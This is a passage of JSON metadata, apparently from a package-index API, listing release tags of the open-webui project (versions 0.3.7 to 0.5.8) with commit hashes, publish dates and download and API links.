ui/open-webui/releases/tag/v0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.8/manifests"},{"name":"v0.5.7","sha":"b72150c881955721a63ae7f4ea1b9ea293816fc1","kind":"commit","published_at":"2025-01-23T21:47:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.7/manifests"},{"name":"v0.5.6","sha":"9dd45ddf7c5cea09be434278edf68f3fdb23dcfd","kind":"commit","published_at":"2025-01-22T22:13:56.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.6/manifests"},{"name":"v0.5.5","sha":"568dbc545cdd7e1d08e0db7851bace82db04a418","kind":"commit","published_at":"2025-01-22T19:34:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.5/manifests"},{"name":"v0.5.4","sha":"506dc0149ca973e20768fa3d6f171afac289f606","kind":"commit","published_at":"2025-01-05T09:38:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.4/manifests"},{"name":"v0.5.3","sha":"4bc9904b3cd0726d3f9c3cbaeade972cf167b6c4","kind":"commit","published_at":"2024-12-31T21:41:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"e42cbf07f5a0c1fea2441e37f36f06510a2a781d","kind":"commit","published_at":"2024-12-27T07:51:49.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"2bdf99b398cf2f5ee3e15672aeecd542a5bf067d","kind":"commit","published_at":"2024-12-26T06:31:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"22132e155aa7e8522f4c79a7aae4bcfc0d7f6b0d","kind":"commit","published_at":"2024-12-25T18:39:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.0/manifests"},{"name":"v0.4.8","sha":"29a271959556743e6deb4d55a5a982983335d7ab","kind":"commit","published_at":"2024-12-07T08:42:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"c4ea31357f49d08a14c86b2bd85fdcd489512e91","kind":"commit","published_at":"2024-12-01T08:42:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"0a26c41c7b58300f37348ba580a4f0d682ca5fbd","kind":"commit","published_at":"2024-11-27T04:24:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.6/manifests"},{"name":"v0.4.5","sha":"4831c9e57e35a0619d9212b7b573e2c6a9443c8c","kind":"commit","published_at":"2024-11-26T09:55:13.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.5/manifests"},{"name":"v0.4.4","sha":"db929b5d5ec1694a80ae707a74a52a6dac9f7451","kind":"commit","published_at":"2024-11-23T03:27:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"c13bcfdfc9fcb9b72e516cb72c89f234511c89df","kind":"commit","published_at":"2024-11-22T06:47:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"6f4bc9864c9ca613fc0dae3ba1db3accfe1d1e5e","kind":"commit","published_at":"2024-11-20T20:24:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"02e94c826440162e381cad382d3ac1b0eb2b3d73","kind":"commit","published_at":"2024-11-20T04:17:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"3c334320921caaeac8ec587dc2e227e3a886177c","kind":"commit","published_at":"2024-11-19T22:28:03.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.4.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.4.0/manifests"},{"name":"v0.3.35","sha":"f1f068f458c07909247484b69bcb9a0e96b4eaeb","kind":"commit","published_at":"2024-10-26T20:17:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.35","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.35","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.35","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.35/manifests"},{"name":"v0.3.34","sha":"f10c729e3d1a1cfc82be5bf970ac3716649f472e","kind":"commit","published_at":"2024-10-26T07:44:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.34/manifests"},{"name":"v0.3.33","sha":"99dd7fb5a836511e02e2a3761aeab75f2e8b5687","kind":"commit","published_at":"2024-10-24T20:36:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.33/manifests"},{"name":"v0.3.32","sha":"bc29d5d3c3534c7e42eb3bdf5fa5e11e7a287aaa","kind":"commit","published_at":"2024-10-07T05:06:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.32/manifests"},{"name":"v0.3.31","sha":"c8c41e07e96140253eae07746ae24a120f9f33b7","kind":"commit","published_at":"2024-10-07T01:50:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.31/manifests"},{"name":"v0.3.30","sha":"7b8f923981b004d6183cd6e4f95b408b613baf9e","kind":"commit","published_at":"2024-09-26T02:13:54.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.30/manifests"},{"name":"v0.3.29","sha":"82cda6e52204f621882df696a4a26cc20ab482a0","kind":"commit","published_at":"2024-09-25T13:46:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.29/manifests"},{"name":"v0.3.28","sha":"534e4c90ca5a95d37d325b2e6a54fa36697ee736","kind":"commit","published_at":"2024-09-24T16:52:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.28/manifests"},{"name":"v0.3.27","sha":"ba20c71963963e58a012eb3d537af7c6c7a543d2","kind":"commit","published_at":"2024-09-24T16:13:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.27/manifests"},{"name":"v0.3.26","sha":"c0738cef26df70a65898bd8e14dbb4c1dc6937a4","kind":"commit","published_at":"2024-09-24T13:41:42.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.26/manifests"},{"name":"v0.3.25","sha":"019cf8199f1f4842b8f61cc3143b782433b55779","kind":"commit","published_at":"2024-09-24T12:07:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.25/manifests"},{"name":"v0.3.24","sha":"7ec72679f0c981e577b71d3f3529ce3e8839521d","kind":"commit","published_at":"2024-09-24T11:32:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.24/manifests"},{"name":"v0.3.23","sha":"ff8a2da751e4b64441909554965cd51c60f5332a","kind":"commit","published_at":"2024-09-21T02:55:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.23/manifests"},{"name":"v0.3.22","sha":"83855b713b0f211144993486ac5265d3d67bb1f8","kind":"commit","published_at":"2024-09-19T22:25:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.22/manifests"},{"name":"v0.3.21","sha":"50db51ebe08c018bf46acfaf55985ff998da50bc","kind":"commit","published_at":"2024-09-07T23:59:40.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.21/manifests"},{"name":"v0.3.20","sha":"e2ef36b582b06f1edef0fe84064ce4ae45fa085b","kind":"commit","published_at":"2024-09-07T04:08:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.20/manifests"},{"name":"v0.3.19","sha":"05c0423d6eba64c78fbcfeda4059e54160d2fd35","kind":"commit","published_at":"2024-09-05T18:47:33.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.19/manifests"},{"name":"v0.3.18","sha":"9204498420c89e347af13fe53b1d0ddcb6379dfc","kind":"commit","published_at":"2024-09-04T18:09:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.18/manifests"},{"name":"v0.3.17","sha":"a9801147b83bfeecc147708941bec1a4b29823cc","kind":"commit","published_at":"2024-09-04T16:40:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.17/manifests"},{"name":"v0.3.16","sha":"693dc3107a71e76e50c0f765b83eaa45acfdab87","kind":"commit","published_at":"2024-08-27T16:49:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.16/manifests"},{"name":"v0.3.15","sha":"847ca660018fe70dc56d29ef86eeee006684058d","kind":"commit","published_at":"2024-08-21T22:28:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.15/manifests"},{"name":"v0.3.14","sha":"8a620cab442ab61b1f80c21d6b68df7b020fb10c","kind":"commit","published_at":"2024-08-21T15:36:58.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.14/manifests"},{"name":"v0.3.13","sha":"13b0e7d64a708f69c5ce58cf0897d9951d0d16ad","kind":"commit","published_at":"2024-08-14T19:45:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.13/manifests"},{"name":"v0.3.12","sha":"c869652ef4907dd123a140d9a08a0c239e690b08","kind":"commit","published_at":"2024-08-07T13:22:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.12/manifests"},{"name":"v0.3.11","sha":"a58dfccb7dab4c7c42c8b4528f1d330bb1626e5f","kind":"commit","published_at":"2024-08-02T22:03:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"c74e7df6a04ec942af476332f4660f9d2a95fb7e","kind":"commit","published_at":"2024-07-17T15:51:35.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"6e843ab563c6843aac3fa5bf13056cdd1ebdbaff","kind":"commit","published_at":"2024-07-17T10:18:37.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"9bcd4ce5c0a01af68c0d2aa44554a68bb741c61b","kind":"commit","published_at":"2024-07-09T21:25:16.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.3.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4900ac5136579c44c1be63f9b093fe8aff199910","kind":"commit","published_at":"2024-06-30T03:26:59.000Z","download_url":"https://codeload.github.com/open-webu